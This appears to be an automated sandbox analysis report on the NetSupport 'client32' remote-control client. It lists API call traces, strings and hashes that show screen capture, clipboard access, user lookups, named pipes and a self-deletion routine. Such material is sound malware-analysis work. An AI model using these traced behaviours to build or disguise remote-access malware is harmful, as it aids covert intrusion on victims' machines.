                                                                              • ioctlsocket.WSOCK32(910C34B3,4004667F,00000000,-000397EB), ref: 6EEF5D1F
                                                                              • select.WSOCK32(00000001,?,00000000,?,00000000,910C34B3,4004667F,00000000,-000397EB), ref: 6EEF5D62
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ioctlsocketselect
                                                                              • String ID:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memmove
                                                                              • String ID:
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110886DF
                                                                              • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection_memset
                                                                              • String ID:
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                              • ExtractIconExA.SHELL32(?,00000000,00030417,00020437,00000001), ref: 11145068
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExtractFileIconModuleName
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              • __lock_file.LIBCMT ref: 11164CBE
                                                                                • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                              • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 6EF06C26
                                                                              • Sleep.KERNEL32(00000064), ref: 6EF06C5B
                                                                                • Part of subcall function 6EF06940: GetTickCount.KERNEL32 ref: 6EF06950
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID:
                                                                              • API String ID: 4250438611-0
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 11176045
                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                              • __tzset_nolock.LIBCMT ref: 11176056
                                                                                • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1828324828-0
                                                                              APIs
                                                                              • WSACancelBlockingCall.WSOCK32 ref: 6EEF63A9
                                                                              • Sleep.KERNEL32(00000032), ref: 6EEF63B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: BlockingCallCancelSleep
                                                                              • String ID:
                                                                              • API String ID: 3706969569-0
                                                                              APIs
                                                                                • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                              • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                              • String ID:
                                                                              • API String ID: 3768737497-0
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_
                                                                              • String ID:
                                                                              • API String ID: 3382485803-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              APIs
                                                                              • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InformationToken
                                                                              • String ID:
                                                                              • API String ID: 4114910276-0
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 328603210-0
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,6EF16F16,00000000,?,6EF1D40B,00000001,6EF16F16,00000000,00000000,00000000,?,6EF16F16,00000001,00000214), ref: 6EF1A0C5
                                                                                • Part of subcall function 6EF160F9: __getptd_noexit.LIBCMT ref: 6EF160F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 328603210-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: __waccess_s
                                                                              • String ID:
                                                                              • API String ID: 4272103461-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: __fsopen
                                                                              • String ID:
                                                                              • API String ID: 3646066109-0
                                                                              APIs
                                                                              • _NSMClient32@8.PCICL32(?,?,?,00F710A2,00000000), ref: 00F7100B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3402039725.0000000000F71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F70000, based on PE: true
                                                                              • API ID: Client32@8
                                                                              • String ID:
                                                                              • API String ID: 433899448-0
                                                                              APIs
                                                                                • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                              • SetCursor.USER32(00000000), ref: 110077F1
                                                                              • GetDC.USER32(?), ref: 1100781D
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                              • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                              • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                              • DeleteDC.GDI32(?), ref: 110079FA
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                              • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                              • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                              • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                              • GetSysColor.USER32(00000004), ref: 11007B50
                                                                              • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • _memset.LIBCMT ref: 11007BC7
                                                                              • _swscanf.LIBCMT ref: 11007C34
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                              • _memset.LIBCMT ref: 11007C8C
                                                                              • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                              • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                              • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                              • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                              • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                              • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                              • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                              • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                              • UpdateWindow.USER32(?), ref: 11007EF2
                                                                              • SetCursor.USER32(?), ref: 11007EFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                              • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2635354838-2303488826
                                                                              • Opcode ID: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                              • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                              • Opcode Fuzzy Hash: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                              • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 11127400
                                                                              • _memset.LIBCMT ref: 1112741D
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                              • _strrchr.LIBCMT ref: 111274AA
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                              • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                              • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                              • wsprintfA.USER32 ref: 11127561
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                              • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                              • _strrchr.LIBCMT ref: 111276AB
                                                                              • _memmove.LIBCMT ref: 11127724
                                                                              • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                              • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                              • API String ID: 2219718054-800295887
                                                                              • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                              • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                              • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                              • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                              • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                              • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                              • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                              • GetTickCount.KERNEL32 ref: 111472A0
                                                                              • GetTickCount.KERNEL32 ref: 111472C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                              • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                              • API String ID: 132346978-2450594007
                                                                              • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                              • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                              • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                              • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 11123836
                                                                              • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                              • IsIconic.USER32(?), ref: 111238C4
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Iconic$FreeInvalidateLibraryRect
                                                                              • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                              • API String ID: 2857465220-3401310001
                                                                              • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                              • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                              • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                              • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                              • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                              • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                              • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                              • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                              • IsIconic.USER32(00000001), ref: 110CB844
                                                                              • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                              • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                              • API String ID: 2655531791-1552842965
                                                                              • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                              • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                              • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                              • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                              APIs
                                                                              • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                              • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                              • GetLastError.KERNEL32 ref: 110F3820
                                                                              • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                              • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                              • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                              • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                              • pSD, xrefs: 110F37C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                              • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                              • API String ID: 3134831419-838605531
                                                                              • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                              • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                              • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                              • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                              • API String ID: 0-293745777
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                              • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                              • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
